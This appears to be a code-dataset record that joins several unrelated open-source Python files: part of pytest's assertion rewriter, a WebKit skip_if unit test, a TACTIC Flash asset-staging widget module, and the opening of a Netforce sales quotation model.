format_dict = ast.Dict(keys, list(current.values()))
form = ast.BinOp(expl_expr, ast.Mod(), format_dict)
name = "@py_format" + str(next(self.variable_counter))
if self.enable_assertion_pass_hook:
self.format_variables.append(name)
self.expl_stmts.append(ast.Assign([ast.Name(name, ast.Store())], form))
return ast.Name(name, ast.Load())
def generic_visit(self, node):
"""Handle expressions we don't have custom code for."""
assert isinstance(node, ast.expr)
res = self.assign(node)
return res, self.explanation_param(self.display(res))
def visit_Assert(self, assert_):
"""Return the AST statements to replace the ast.Assert instance.
This rewrites the test of an assertion to provide
intermediate values and replace it with an if statement which
raises an assertion error with a detailed explanation in case
the expression is false.
"""
if isinstance(assert_.test, ast.Tuple) and len(assert_.test.elts) >= 1:
from _pytest.warning_types import PytestAssertRewriteWarning
import warnings
# Ignore type: typeshed bug https://github.com/python/typeshed/pull/3121
warnings.warn_explicit( # type: ignore
PytestAssertRewriteWarning(
"assertion is always true, perhaps remove parentheses?"
),
category=None,
filename=self.module_path,
lineno=assert_.lineno,
)
self.statements = [] # type: List[ast.stmt]
self.variables = [] # type: List[str]
self.variable_counter = itertools.count()
if self.enable_assertion_pass_hook:
self.format_variables = [] # type: List[str]
self.stack = [] # type: List[Dict[str, ast.expr]]
self.expl_stmts = [] # type: List[ast.stmt]
self.push_format_context()
# Rewrite assert into a bunch of statements.
top_condition, explanation = self.visit(assert_.test)
# If in a test module, check if directly asserting None, in order to warn [Issue #3191]
if self.module_path is not None:
self.statements.append(
self.warn_about_none_ast(
top_condition, module_path=self.module_path, lineno=assert_.lineno
)
)
if self.enable_assertion_pass_hook: # Experimental pytest_assertion_pass hook
negation = ast.UnaryOp(ast.Not(), top_condition)
msg = self.pop_format_context(ast.Str(explanation))
# Failed
if assert_.msg:
assertmsg = self.helper("_format_assertmsg", assert_.msg)
gluestr = "\n>assert "
else:
assertmsg = ast.Str("")
gluestr = "assert "
err_explanation = ast.BinOp(ast.Str(gluestr), ast.Add(), msg)
err_msg = ast.BinOp(assertmsg, ast.Add(), err_explanation)
err_name = ast.Name("AssertionError", ast.Load())
fmt = self.helper("_format_explanation", err_msg)
exc = ast.Call(err_name, [fmt], [])
raise_ = ast.Raise(exc, None)
statements_fail = []
statements_fail.extend(self.expl_stmts)
statements_fail.append(raise_)
# Passed
fmt_pass = self.helper("_format_explanation", msg)
orig = self._assert_expr_to_lineno()[assert_.lineno]
hook_call_pass = ast.Expr(
self.helper(
"_call_assertion_pass",
ast.Num(assert_.lineno),
ast.Str(orig),
fmt_pass,
)
)
# If any hooks implement assert_pass hook
hook_impl_test = ast.If(
self.helper("_check_if_assertion_pass_impl"),
self.expl_stmts + [hook_call_pass],
[],
)
statements_pass = [hook_impl_test]
# Test for assertion condition
main_test = ast.If(negation, statements_fail, statements_pass)
self.statements.append(main_test)
if self.format_variables:
variables = [
ast.Name(name, ast.Store()) for name in self.format_variables
]
clear_format = ast.Assign(variables, ast.NameConstant(None))
self.statements.append(clear_format)
else: # Original assertion rewriting
# Create failure message.
body = self.expl_stmts
negation = ast.UnaryOp(ast.Not(), top_condition)
self.statements.append(ast.If(negation, body, []))
if assert_.msg:
assertmsg = self.helper("_format_assertmsg", assert_.msg)
explanation = "\n>assert " + explanation
else:
assertmsg = ast.Str("")
explanation = "assert " + explanation
template = ast.BinOp(assertmsg, ast.Add(), ast.Str(explanation))
msg = self.pop_format_context(template)
fmt = self.helper("_format_explanation", msg)
err_name = ast.Name("AssertionError", ast.Load())
exc = ast.Call(err_name, [fmt], [])
raise_ = ast.Raise(exc, None)
body.append(raise_)
# Clear temporary variables by setting them to None.
if self.variables:
variables = [ast.Name(name, ast.Store()) for name in self.variables]
clear = ast.Assign(variables, ast.NameConstant(None))
self.statements.append(clear)
# Fix line numbers.
for stmt in self.statements:
set_location(stmt, assert_.lineno, assert_.col_offset)
return self.statements
def warn_about_none_ast(self, node, module_path, lineno):
"""
Returns an AST issuing a warning if the value of node is `None`.
This is used to warn the user when asserting a function that asserts
internally already.
See issue #3191 for more details.
"""
val_is_none = ast.Compare(node, [ast.Is()], [ast.NameConstant(None)])
send_warning = ast.parse(
"""\
from _pytest.warning_types import PytestAssertRewriteWarning
from warnings import warn_explicit
warn_explicit(
PytestAssertRewriteWarning('asserting the value None, please use "assert is None"'),
category=None,
filename={filename!r},
lineno={lineno},
)
""".format(
filename=module_path, lineno=lineno
)
).body
return ast.If(val_is_none, send_warning, [])
def visit_Name(self, name):
# Display the repr of the name if it's a local variable or
# _should_repr_global_name() thinks it's acceptable.
locs = ast.Call(self.builtin("locals"), [], [])
inlocs = ast.Compare(ast.Str(name.id), [ast.In()], [locs])
dorepr = self.helper("_should_repr_global_name", name)
test = ast.BoolOp(ast.Or(), [inlocs, dorepr])
expr = ast.IfExp(test, self.display(name), ast.Str(name.id))
return name, self.explanation_param(expr)
def visit_BoolOp(self, boolop):
res_var = self.variable()
expl_list = self.assign(ast.List([], ast.Load()))
app = ast.Attribute(expl_list, "append", ast.Load())
is_or = int(isinstance(boolop.op, ast.Or))
body = save = self.statements
fail_save = self.expl_stmts
levels = len(boolop.values) - 1
self.push_format_context()
# Process each operand, short-circuiting if needed.
for i, v in enumerate(boolop.values):
if i:
fail_inner = [] # type: List[ast.stmt]
# cond is set in a prior loop iteration below
self.expl_stmts.append(ast.If(cond, fail_inner, [])) # noqa
self.expl_stmts = fail_inner
self.push_format_context()
res, expl = self.visit(v)
body.append(ast.Assign([ast.Name(res_var, ast.Store())], res))
expl_format = self.pop_format_context(ast.Str(expl))
call = ast.Call(app, [expl_format], [])
self.expl_stmts.append(ast.Expr(call))
if i < levels:
cond = res # type: ast.expr
if is_or:
cond = ast.UnaryOp(ast.Not(), cond)
inner = [] # type: List[ast.stmt]
self.statements.append(ast.If(cond, inner, []))
self.statements = body = inner
self.statements = save
self.expl_stmts = fail_save
expl_template = self.helper("_format_boolop", expl_list, ast.Num(is_or))
expl = self.pop_format_context(expl_template)
return ast.Name(res_var, ast.Load()), self.explanation_param(expl)
def visit_UnaryOp(self, unary):
pattern = UNARY_MAP[unary.op.__class__]
operand_res, operand_expl = self.visit(unary.operand)
res = self.assign(ast.UnaryOp(unary.op, operand_res))
return res, pattern % (operand_expl,)
def visit_BinOp(self, binop):
symbol = BINOP_MAP[binop.op.__class__]
left_expr, left_expl = self.visit(binop.left)
right_expr, right_expl = self.visit(binop.right)
explanation = "({} {} {})".format(left_expl, symbol, right_expl)
res = self.assign(ast.BinOp(left_expr, binop.op, right_expr))
return res, explanation
def visit_Call(self, call):
"""
visit `ast.Call` nodes
"""
new_func, func_expl = self.visit(call.func)
arg_expls = []
new_args = []
new_kwargs = []
for arg in call.args:
res, expl = self.visit(arg)
arg_expls.append(expl)
new_args.append(res)
for keyword in call.keywords:
res, expl = self.visit(keyword.value)
new_kwargs.append(ast.keyword(keyword.arg, res))
if keyword.arg:
arg_expls.append(keyword.arg + "=" + expl)
else: # **args have `arg` keywords with an .arg of None
arg_expls.append("**" + expl)
expl = "{}({})".format(func_expl, ", ".join(arg_expls))
new_call = ast.Call(new_func, new_args, new_kwargs)
res = self.assign(new_call)
res_expl = self.explanation_param(self.display(res))
outer_expl = "{}\n{{{} = {}\n}}".format(res_expl, res_expl, expl)
return res, outer_expl
def visit_Starred(self, starred):
# From Python 3.5, a Starred node can appear in a function call
res, expl = self.visit(starred.value)
new_starred = ast.Starred(res, starred.ctx)
return new_starred, "*" + expl
def visit_Attribute(self, attr):
if not isinstance(attr.ctx, ast.Load):
return self.generic_visit(attr)
value, value_expl = self.visit(attr.value)
res = self.assign(ast.Attribute(value, attr.attr, ast.Load()))
res_expl = self.explanation_param(self.display(res))
pat = "%s\n{%s = %s.%s\n}"
expl = pat % (res_expl, res_expl, value_expl, attr.attr)
return res, expl
def visit_Compare(self, comp: ast.Compare):
self.push_format_context()
left_res, left_expl = self.visit(comp.left)
if isinstance(comp.left, (ast.Compare, ast.BoolOp)):
left_expl = "({})".format(left_expl)
res_variables = [self.variable() for i in range(len(comp.ops))]
load_names = [ast.Name(v, ast.Load()) for v in res_variables]
store_names = [ast.Name(v, ast.Store()) for v in res_variables]
it = zip(range(len(comp.ops)), comp.ops, comp.comparators)
expls = []
syms = []
results = [left_res]
for i, op, next_operand in it:
next_res, next_expl = self.visit(next_operand)
if isinstance(next_operand, (ast.Compare, ast.BoolOp)):
next_expl = "({})".format(next_expl)
results.append(next_res)
sym = BINOP_MAP[op.__class__]
syms.append(ast.Str(sym))
expl = "{} {} {}".format(left_expl, sym, next_expl)
expls.append(ast.Str(expl))
res_expr = ast.Compare(left_res, [op], [next_res])
self.statements.append(ast.Assign([store_names[i]], res_expr))
left_res, left_expl = next_res, next_expl
# Use pytest.assertion.util._reprcompare if that's available.
expl_call = self.helper(
"_call_reprcompare",
ast.Tuple(syms, ast.Load()),
ast.Tuple(load_names, ast.Load()),
ast.Tuple(expls, ast.Load()),
ast.Tuple(results, ast.Load()),
)
if len(comp.ops) > 1:
res = ast.BoolOp(ast.And(), load_names) # type: ast.expr
else:
res = load_names[0]
return res, self.explanation_param(self.pop_format_context(expl_call))
def try_mkdir(cache_dir):
"""Attempts to create the given directory, returns True if successful"""
try:
os.mkdir(cache_dir)
except FileExistsError:
# Either the __pycache__ directory already exists (the
# common case) or it's blocked by a non-dir node. In the
# latter case, we'll ignore it in _write_pyc.
return True
except (FileNotFoundError, NotADirectoryError):
# One of the path components was not a directory, likely
# because we're in a zip file.
return False
except PermissionError:
return False
except OSError as e:
# as of now, EROFS doesn't have an equivalent OSError-subclass
if e.errno == errno.EROFS:
return False
raise
return True
| apache-2.0 |
farhi-naz/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/test/skip_unittest.py | 124 | 3049 | # Copyright (C) 2010 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import StringIO
import logging
import unittest2 as unittest
from webkitpy.test.skip import skip_if
class SkipTest(unittest.TestCase):
def setUp(self):
self.logger = logging.getLogger(__name__)
self.old_level = self.logger.level
self.logger.setLevel(logging.INFO)
self.old_propagate = self.logger.propagate
self.logger.propagate = False
self.log_stream = StringIO.StringIO()
self.handler = logging.StreamHandler(self.log_stream)
self.logger.addHandler(self.handler)
self.foo_was_called = False
def tearDown(self):
self.logger.removeHandler(self.handler)
self.propagate = self.old_propagate
self.logger.setLevel(self.old_level)
def create_fixture_class(self):
class TestSkipFixture(object):
def __init__(self, callback):
self.callback = callback
def test_foo(self):
self.callback()
return TestSkipFixture
def foo_callback(self):
self.foo_was_called = True
def test_skip_if_false(self):
klass = skip_if(self.create_fixture_class(), False, 'Should not see this message.', logger=self.logger)
klass(self.foo_callback).test_foo()
self.assertEqual(self.log_stream.getvalue(), '')
self.assertTrue(self.foo_was_called)
def test_skip_if_true(self):
klass = skip_if(self.create_fixture_class(), True, 'Should see this message.', logger=self.logger)
klass(self.foo_callback).test_foo()
self.assertEqual(self.log_stream.getvalue(), 'Skipping webkitpy.test.skip_unittest.TestSkipFixture: Should see this message.\n')
self.assertFalse(self.foo_was_called)
| bsd-3-clause |
hsuchie4/TACTIC | src/pyasm/deprecated/flash/widget/flash_shot_instance_adder_wdg.py | 6 | 12267 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['FlashShotInstanceAdderWdg', 'FlashLayerInstanceAdderWdg', 'FlashEpisodePlannerWdg', 'FlashLayerStageWdg', 'EpisodePlannerCbk']
from pyasm.web import *
from pyasm.widget import *
from pyasm.search import *
from pyasm.biz import *
from pyasm.flash import *
from pyasm.prod.biz import *
from pyasm.prod.web import *
class FlashAssetFilter(DivWdg):
def init(my):
nav = EpisodeNavigatorWdg(name="initial_episode")
nav.add_none_option()
my.episode_code = nav.get_value()
my.add(nav)
text_wdg = TextWdg("asset_search")
text_wdg.set_persist_on_submit()
text_wdg.add_style('margin-bottom: 3px')
my.asset_search = text_wdg.get_value()
my.add(SpanWdg(text_wdg, css='med'))
def alter_search(my, search):
has_filter = False
if my.episode_code != "":
search.add_filter("episode_code", my.episode_code)
has_filter = True
if my.asset_search != "":
my.asset_search = my.asset_search.lower()
columns = my.get_search_columns()
expr = [Search.get_regex_filter(x, my.asset_search) for x in columns]
filter = "(%s)" %" or ".join(expr)
search.add_where(filter)
has_filter = True
#if not has_filter:
# search.add_where("NULL")
def get_search_columns(my):
return ['code','name','description']
class FlashEpisodeFilterWdg(EpisodeFilterWdg):
pass
class FlashEpisodeShotNavigatorFilter(EpisodeShotFilterWdg):
def alter_search(my, search):
if my.get_value() != "":
search.add_filter("shot_code", my.get_value())
class FlashShotInstanceAdderWdg(ShotInstanceAdderWdg):
CONTAINER_NAME = 'Shots'
BUTTON_LABEL = "Populate with Assets"
LOAD_MODE = 'load_mode'
PREFIX_MODE = 'prefix_mode'
def get_left_filter(my, search=None):
widget = Widget()
asset_filter = AssetFilterWdg()
asset_filter.alter_search(search)
widget.add(asset_filter)
widget.add( HtmlElement.br(2) )
instance_filter = EpisodeInstanceFilterWdg()
instance_filter.alter_search(search)
widget.add(instance_filter)
use_epi = FilterCheckboxWdg( EpisodeInstanceFilterWdg.OPTION_NAME,\
label='Filter by Episode Planner')
widget.add(use_epi)
return widget
def get_right_filter(my, search):
filter = FlashEpisodeFilterWdg()
filter.add_none_option()
return filter
def get_action_wdg(my):
main_div = DivWdg(css="filter_box center_content")
div = DivWdg()
main_div.add(div)
div.add_style('height', '16px')
div.add_style('margin', '3px 0 3px 0')
div.add(HtmlElement.b("Action: "))
add_button = IconSubmitWdg(my.ADD_BUTTON, IconWdg.ADD, long=True)
div.add(add_button)
remove_button = IconSubmitWdg("Remove from %s" % my.CONTAINER_NAME, IconWdg.DELETE, long=True)
div.add(remove_button)
# register the add commands
# TODO: make into ajax:
for cbk in my.get_action_cbk():
WebContainer.register_cmd(cbk)
stage_button = IconSubmitWdg(my.BUTTON_LABEL, long=True)
div.add(SpanWdg(stage_button, css='large'))
# add a hint
hint = HintWdg('To populate a shot with assets, you need to first [Add Assets] to the shot. ' \
'Then you can check the checkbox for the shot and click on [%s]' % my.BUTTON_LABEL)
div.add(hint)
div.add(HiddenWdg(my.LOAD_MODE, 'merge'))
folderless = HiddenWdg(my.PREFIX_MODE, 'true')
folderless.set_attr('checked','1')
div.add(folderless)
div.add(FlashShotStageWdg())
return main_div
class FlashEpisodePlannerWdg(SequencePlannerWdg):
ADD_BUTTON = "Add Assets to Episode"
def get_left_filter(my, search):
return AssetFilterWdg()
def get_action_wdg(my):
main_div = DivWdg(css="filter_box center_content")
div = DivWdg()
div.add_style('height', '16px')
div.add_style('margin', '3px 0 3px 0')
main_div.add(my.get_view_select())
main_div.add(div)
div.add(HtmlElement.b("Action: "))
add_button = IconSubmitWdg(my.ADD_BUTTON, IconWdg.ADD, long=True)
div.add(add_button)
WebContainer.register_cmd("pyasm.flash.widget.EpisodePlannerCbk")
return main_div
class EpisodePlannerCbk(SequencePlannerCbk):
def check(my):
web = WebContainer.get_web()
if web.get_form_value(FlashEpisodePlannerWdg.ADD_BUTTON) != "":
return True
return False
class FlashLayerInstanceAdderWdg(ShotInstanceAdderWdg):
CONTAINER_NAME = 'Layers'
BUTTON_LABEL = "Populate with Assets"
LOAD_MODE = 'load_mode'
PREFIX_MODE = 'prefix_mode'
def get_left_search_type(my):
return "prod/asset"
def get_right_search_type(my):
return "prod/layer"
def get_left_filter(my, search):
return FlashAssetFilter()
def get_right_filter(my, search):
filter = FlashEpisodeShotNavigatorFilter()
filter.add_none_option()
return filter
def get_action_cbk(my):
return ["pyasm.prod.web.LayerInstanceAdderCbk", \
"pyasm.prod.web.LayerInstanceRemoverCbk"]
def get_action_wdg(my):
div = DivWdg(css="filter_box")
div.add(HtmlElement.b("Action: "))
add_button = SubmitWdg("Add Assets")
div.add(add_button)
remove_button = SubmitWdg("Remove from %s" % my.CONTAINER_NAME)
div.add(remove_button)
# add the staging button
stage_button = SubmitWdg(my.BUTTON_LABEL)
stage_button.add_style('background-color: #e6edbe')
div.add(SpanWdg(stage_button, css='large'))
for cbk in my.get_action_cbk():
WebContainer.register_cmd(cbk)
div.add(HiddenWdg(my.LOAD_MODE, 'merge'))
folderless = HiddenWdg(my.PREFIX_MODE, 'true')
folderless.set_attr('checked','1')
div.add(folderless)
div.add(FlashLayerStageWdg())
return div
class FlashSObjectStageWdg(Widget):
''' This widget draws all the script required for the staging process
for flash layers '''
BUTTON_LABEL = "Populate with Assets"
LOAD_MODE = "load_mode"
def check(my):
web = WebContainer.get_web()
if web.get_form_value(my.BUTTON_LABEL) != "":
return True
def get_publish_command(my):
pass
def get_search_type(my):
return FlashLayer.SEARCH_TYPE
def get_checkbox_name(my):
return LayerCheckboxWdg.CB_NAME
def get_container_sobjects(my, container):
layer_insts = LayerInstance.get_all_by_layer(container)
asset_codes = SObject.get_values(layer_insts, 'asset_code', unique=True)
search = Search( FlashAsset.SEARCH_TYPE )
search.add_filters('code', asset_codes)
sobjs = search.get_sobjects()
return sobjs
def init(my):
if not my.check():
return
my.add(GeneralAppletWdg())
my.flash = Flash()
web = WebContainer.get_web()
# create the necessary hidden widgets which the upload appliet
# will look at
search_type_wdg = HiddenWdg("search_type", my.get_search_type())
my.add(search_type_wdg)
uploaded_wdg = HiddenWdg(SObjectUploadCmd.FILE_NAMES)
my.add(uploaded_wdg)
description = HiddenWdg(SObjectUploadCmd.PUBLISH_COMMENT)
my.add(description)
value = uploaded_wdg.get_value()
# register the command
WebContainer.register_cmd( my.get_publish_command() )
# get all of the selected
selected = web.get_form_values(my.get_checkbox_name())
if not selected:
return
containers = []
for select in selected:
container = Search.get_by_search_key(select)
containers.append(container)
# close all of the documents in the fl
BaseAppServer.add_onload_script( my.flash.get_close_docs() )
use_container = True
# get the container assets
for container in containers:
sobjs = my.get_container_sobjects(container)
if not sobjs:
continue
# start with container.
if use_container:
my.add_load_script(container, no_alerts=True)
for sobj in sobjs:
my.add_load_script(sobj, no_alerts=True)
# publish after load
my.add_stage_script(container)
my.close_docs()
BaseAppServer.add_onload_script( \
"document.form.elements['%s'].value = 'Populate assets in layers [%s]';" % (SObjectUploadCmd.PUBLISH_COMMENT, container.get_code() ) )
ajax = AjaxCmd()
ajax.register_cmd( my.get_publish_command() )
# FiXME: some privileged knowledge here
ajax.add_element_name("upload_files")
ajax.set_option( "search_type", my.get_search_type() )
BaseAppServer.add_onload_script( ajax.get_on_script() )
BaseAppServer.add_onload_script("Common.pause(1000);document.form.upload_files.value = '';document.form.submit()")
#BaseAppServer.add_onload_script("document.form.elements['%s'].value \
# = 'Populate assets in layers [%s]'; \
# document.form.submit()" % (SObjectUploadCmd.PUBLISH_COMMENT, \
# ', '.join(SObject.get_values(containers, 'id', unique=True))))
def close_docs(my):
BaseAppServer.add_onload_script("pyflash.close_docs()")
def add_load_script(my, sobject, no_alerts=False):
script = ''
if sobject.is_general_asset():
flash_import = FlashImport(sobject)
flash_import.set_load_msg_id('')
script = flash_import.get_stage_script()
else:
flash_load = FlashLoad(sobject)
flash_load.set_load_msg_id('')
script = flash_load.get_script()
if no_alerts and script.startswith("alert"):
return
BaseAppServer.add_onload_script(script)
def add_stage_script(my, container):
'''rename the layers in flash and publish it as a new version
of this layer'''
flash_stage = FlashStage(container)
stage_script = flash_stage.get_script()
BaseAppServer.add_onload_script( stage_script )
class FlashLayerStageWdg(FlashSObjectStageWdg):
def get_publish_command(my):
return "pyasm.flash.FlashLayerPublishCmd"
def get_search_type(my):
return FlashLayer.SEARCH_TYPE
def get_checkbox_name(my):
return LayerCheckboxWdg.CB_NAME
def get_container_sobjects(my, container):
layer_insts = LayerInstance.get_all_by_layer(container)
asset_codes = SObject.get_values(layer_insts, 'asset_code', unique=True)
search = Search( FlashAsset.SEARCH_TYPE )
search.add_filters('code', asset_codes)
sobjs = search.get_sobjects()
return sobjs
class FlashShotStageWdg(FlashSObjectStageWdg):
def get_publish_command(my):
return "pyasm.flash.FlashShotPublishCmd"
def get_search_type(my):
return FlashShot.SEARCH_TYPE
def get_checkbox_name(my):
return ShotCheckboxWdg.CB_NAME
def get_container_sobjects(my, container):
layer_insts = ShotInstance.get_all_by_shot(container)
asset_codes = SObject.get_values(layer_insts, 'asset_code', unique=True)
search = Search( FlashAsset.SEARCH_TYPE )
search.add_filters('code', asset_codes)
sobjs = search.get_sobjects()
return sobjs
| epl-1.0 |
nfco/netforce | netforce_sale/netforce_sale/models/sale_quot.py | 2 | 28079 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields, get_model
from netforce.utils import get_data_path
from netforce.database import get_active_db
import time
import uuid
from netforce.access import get_active_company, set_active_user, get_active_user
from . import utils
from decimal import *
class SaleQuot(Model):
_name = "sale.quot"
_string = "Quotation"
_audit_log = True
_name_field = "number"
_key = ["number"]
_multi_company = True
_fields = {
"number": fields.Char("Number", required=True, search=True),
"ref": fields.Char("Ref", search=True),
"contact_id": fields.Many2One("contact", "Contact", required=True, search=True),
"date": fields.Date("Date", required=True, search=True),
"exp_date": fields.Date("Valid Until"),
"state": fields.Selection([("draft", "Draft"), ("waiting_approval", "Awaiting Approval"), ("approved", "Approved"), ("won", "Won"), ("lost", "Lost"), ("revised", "Revised")], "Status", function="get_state", store=True),
"lines": fields.One2Many("sale.quot.line", "quot_id", "Lines"),
"amount_subtotal": fields.Decimal("Subtotal", function="get_amount", function_multi=True, store=True),
"amount_tax": fields.Decimal("Tax Amount", function="get_amount", function_multi=True, store=True),
"amount_total": fields.Decimal("Total", function="get_amount", function_multi=True, store=True),
"amount_total_words": fields.Char("Total Words", function="get_amount_total_words"),
"qty_total": fields.Decimal("Total", function="get_qty_total"),
"currency_id": fields.Many2One("currency", "Currency", required=True),
"opport_id": fields.Many2One("sale.opportunity", "Opportunity", search=True),
"user_id": fields.Many2One("base.user", "Owner", search=True),
"tax_type": fields.Selection([["tax_ex", "Tax Exclusive"], ["tax_in", "Tax Inclusive"], ["no_tax", "No Tax"]], "Tax Type", required=True),
"sales": fields.One2Many("sale.order", "quot_id", "Sales Orders"),
"payment_terms": fields.Text("Payment Terms"),
"other_info": fields.Text("Other Information"),
"comments": fields.One2Many("message", "related_id", "Comments"),
"activities": fields.One2Many("activity", "related_id", "Activities"),
"documents": fields.One2Many("document", "related_id", "Documents"),
"uuid": fields.Char("UUID"),
"price_list_id": fields.Many2One("price.list", "Price List"),
"emails": fields.One2Many("email.message", "related_id", "Emails"),
"company_id": fields.Many2One("company", "Company"),
"related_id": fields.Reference([["issue", "Issue"]], "Related To"),
"ship_term_id": fields.Many2One("ship.term", "Shipping Terms"),
"sequence_id": fields.Many2One("sequence", "Number Sequence"),
"job_template_id": fields.Many2One("job.template", "Service Order Template"),
"lost_sale_code_id": fields.Many2One("reason.code", "Lost Sale Reason Code", condition=[["type", "=", "lost_sale"]]),
"agg_amount_total": fields.Decimal("Total Amount", agg_function=["sum", "amount_total"]),
"agg_amount_subtotal": fields.Decimal("Total Amount w/o Tax", agg_function=["sum", "amount_subtotal"]),
"year": fields.Char("Year", sql_function=["year", "date"]),
"quarter": fields.Char("Quarter", sql_function=["quarter", "date"]),
"month": fields.Char("Month", sql_function=["month", "date"]),
"week": fields.Char("Week", sql_function=["week", "date"]),
"est_costs": fields.One2Many("quot.cost","quot_id","Costs"),
"est_cost_amount": fields.Float("Estimated Cost Amount", function="get_est_profit", function_multi=True),
"est_profit_amount": fields.Float("Estimated Profit Amount", function="get_est_profit", function_multi=True),
"est_margin_percent": fields.Float("Estimated Margin %", function="get_est_profit", function_multi=True),
"currency_rates": fields.One2Many("custom.currency.rate","related_id","Currency Rates"),
}
def _get_number(self, context={}):
seq_id = get_model("sequence").find_sequence(type="sale_quot")
if not seq_id:
return None
while 1:
num = get_model("sequence").get_next_number(seq_id, context=context)
if not num:
return None
user_id = get_active_user()
set_active_user(1)
res = self.search([["number", "=", num]])
set_active_user(user_id)
if not res:
return num
get_model("sequence").increment_number(seq_id, context=context)
def _get_currency(self, context={}):
settings = get_model("settings").browse(1)
return settings.currency_id.id
_defaults = {
"state": "draft",
"date": lambda *a: time.strftime("%Y-%m-%d"),
"number": _get_number,
"currency_id": _get_currency,
"tax_type": "tax_ex",
"user_id": lambda self, context: get_active_user(),
"uuid": lambda *a: str(uuid.uuid4()),
"company_id": lambda *a: get_active_company(),
}
_constraints = ["check_fields"]
_order = "date desc"
def check_fields(self, ids, context={}):
for obj in self.browse(ids):
if obj.state in ("waiting_approval", "approved"):
if not obj.lines:
raise Exception("No lines in quotation")
def create(self, vals, **kw):
id = super().create(vals, **kw)
self.function_store([id])
return id
def write(self, ids, vals, **kw):
opport_ids = []
for obj in self.browse(ids):
if obj.opport_id:
opport_ids.append(obj.opport_id.id)
super().write(ids, vals, **kw)
if opport_ids:
get_model("sale.opportunity").function_store(opport_ids)
self.function_store(ids)
def function_store(self, ids, field_names=None, context={}):
super().function_store(ids, field_names, context)
opport_ids = []
for obj in self.browse(ids):
if obj.opport_id:
opport_ids.append(obj.opport_id.id)
if opport_ids:
get_model("sale.opportunity").function_store(opport_ids)
def get_amount(self, ids, context={}):
res = {}
for obj in self.browse(ids):
vals = {}
subtotal = 0
tax = 0
for line in obj.lines:
if line.is_hidden:
continue
if line.tax_id:
line_tax = get_model("account.tax.rate").compute_tax(
line.tax_id.id, line.amount, tax_type=obj.tax_type)
else:
line_tax = 0
tax += line_tax
if obj.tax_type == "tax_in":
subtotal += (line.amount or 0) - line_tax
else:
subtotal += line.amount or 0
vals["amount_subtotal"] = subtotal
vals["amount_tax"] = tax
vals["amount_total"] = subtotal + tax
res[obj.id] = vals
return res
def get_qty_total(self, ids, context={}):
res = {}
for obj in self.browse(ids):
qty = sum([line.qty for line in obj.lines])
res[obj.id] = qty or 0
return res
def submit_for_approval(self, ids, context={}):
for obj in self.browse(ids):
if obj.state != "draft":
raise Exception("Invalid state")
obj.write({"state": "waiting_approval"})
self.trigger(ids, "submit_for_approval")
def approve(self, ids, context={}):
for obj in self.browse(ids):
if obj.state not in ("draft", "waiting_approval"):
raise Exception("Invalid state")
obj.write({"state": "approved"})
def update_amounts(self, context):
print("update_amounts")
data = context["data"]
data["amount_subtotal"] = 0
data["amount_tax"] = 0
tax_type = data["tax_type"]
for line in data["lines"]:
if not line:
continue
amt = (line.get("qty") or 0) * (line.get("unit_price") or 0)
if line.get("discount"):
disc = amt * line["discount"] / Decimal(100)
amt -= disc
else:
disc = 0
line["amount"] = amt
hide_parents=[]
for line in data["lines"]:
if not line:
continue
if line.get("sequence") and line.get("hide_sub"):
hide_parents.append(line["sequence"])
is_hidden={}
hide_totals={}
for line in data["lines"]:
if not line:
continue
if not line.get("sequence"):
continue
parent_seq=None
for seq in hide_parents:
if line["sequence"].startswith(seq+"."):
parent_seq=seq
break
if parent_seq:
is_hidden[line["sequence"]]=True
hide_totals.setdefault(parent_seq,0)
hide_totals[parent_seq]+=line["amount"]
for line in data["lines"]:
if not line:
continue
if line.get("sequence") and line.get("hide_sub"):
line["amount"]=hide_totals.get(line["sequence"],0)
if line["qty"]:
line["unit_price"]=line["amount"]/line["qty"]
for line in data["lines"]:
if is_hidden.get(line.get("sequence")):
continue
tax_id = line.get("tax_id")
if tax_id:
tax = get_model("account.tax.rate").compute_tax(tax_id, line["amount"], tax_type=tax_type)
data["amount_tax"] += tax
else:
